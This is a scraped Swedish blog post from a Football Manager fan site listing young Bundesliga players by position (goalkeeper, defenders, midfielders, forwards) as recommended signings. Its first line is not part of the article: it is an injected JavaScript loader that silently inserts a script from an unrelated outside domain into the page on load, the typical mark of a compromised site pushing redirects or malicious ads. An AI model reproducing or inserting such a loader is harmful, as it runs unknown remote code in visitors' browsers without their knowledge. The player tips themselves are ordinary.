;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Talangerna man borde värva i Bundesliga – FMSweden
Meny Stäng

Talangerna man borde värva i Bundesliga

Keven Tysk-tisdag

Denna vecka tänkte jag tipsa om ett par intressanta namn från Bundesliga som man borde hålla ett extra öga på.

Målvakt:

Christian Früchtl (född 2000) – lovande målvakt som i verkligheten har blivit utlånad från Bayern München till Nürnberg. Kan även köpa loss honom för en rätt så billig peng med tanke på Bayern Münchens tuffa målvaktskonkurrens (Neuer, Nübel och Ulreich).

 

Försvarare:

Rick van Drongelen (född 1998) – mångsidig försvarare som också kan skolas om till det defensiv mittfältare. Inte den spelaren som blir världens bästa på sin position, men en oerhört nyttig lagspelare.

 

Ibrahima Konaté (född 1999) – RB Leipzig har inte bara en fransk försvarsbjässe i Dayot Upamecano, nämligen också Konaté. Den 21-åriga försvararen är en stor tung mittback som har en hög högsta nivå. Oturligt nog har han haft en del skadebekymmer.

 

Edmond Tapsoba (född 1999) Bayer Leverkusens nya mittbacksdiamant har gjort stora avtryck i sin debutsäsong för klubben. Trots sin ringa ålder har han visat på fina ledaregenskaper och framförallt ett starkt och stabilt försvarsspel.

 

Noah Katterbach (född 2001) – lovande vänsterback som har gjort det väldigt bra i FC Köln.

 

Armel Bella-Kotchap (född 2001) – det finns en hel del lovande försvarare i Bundesliga och dessutom i 2.Bundesliga där vi hittar Bella-Kotchap i Bochum. Stor stark försvararen som har potentialen att bli en komplett mittback.

 

Ozan Kabak (född 2000) – det är ingen slump att Liverpool jagar den 20-åriga turkiska mittbacken Kabak från Schalke. Även lag som Bayern München har varit ute efter försvarstalangen.

 

Mittfältare:

Weston McKennie (född 1998) – mångsidig mittfältare som ryktas till flera klubbar i Europa just nu.

 

Florian Wirtz (född 2003) – tredje yngsta spelaren i Bundesligas historia att göra ligadebut (17 år och 15 dagar). Kan både spela centralt och på kanterna.

 

Jan Thielmann (född 2002) – en ung lovande ytter som har en fin potential.

 

Javairô Dilrosun (född 1998) – en före detta City-talang som har kommit till Bundesliga. Dilrosun spelar till vardags i Hertha Berlin och har visat sig på flera FM-saves vara en väldigt bra ytter/wingback.

 

Giovanni Reyna (född 2002) – han har redan presenterat sig på den stora scenen när han bland annat hoppade in i matchen mot PSG och spelade fram Haaland i Champions League-matchen i våras. En äkta mittfältsdiamant som oftast känner sig hemma i det offensiva mittfältet.

 

Anfallare:

Jonathan Burkardt (född 2000) – mångsidig anfallare som också kan spela på kanten. Oerhört lojal och hög arbetskapacitet.

 

Joshua Zirkzee (född 2001) – en stor stark targetanfallare som har fått sitt lilla genombrott denna säsong i Bayern München. Man kan köpa honom för en prisvärd summa om man är tidigt in på saven.

Please wait...

Liknande Inlägg

14 kommentarer

Lämna ett svar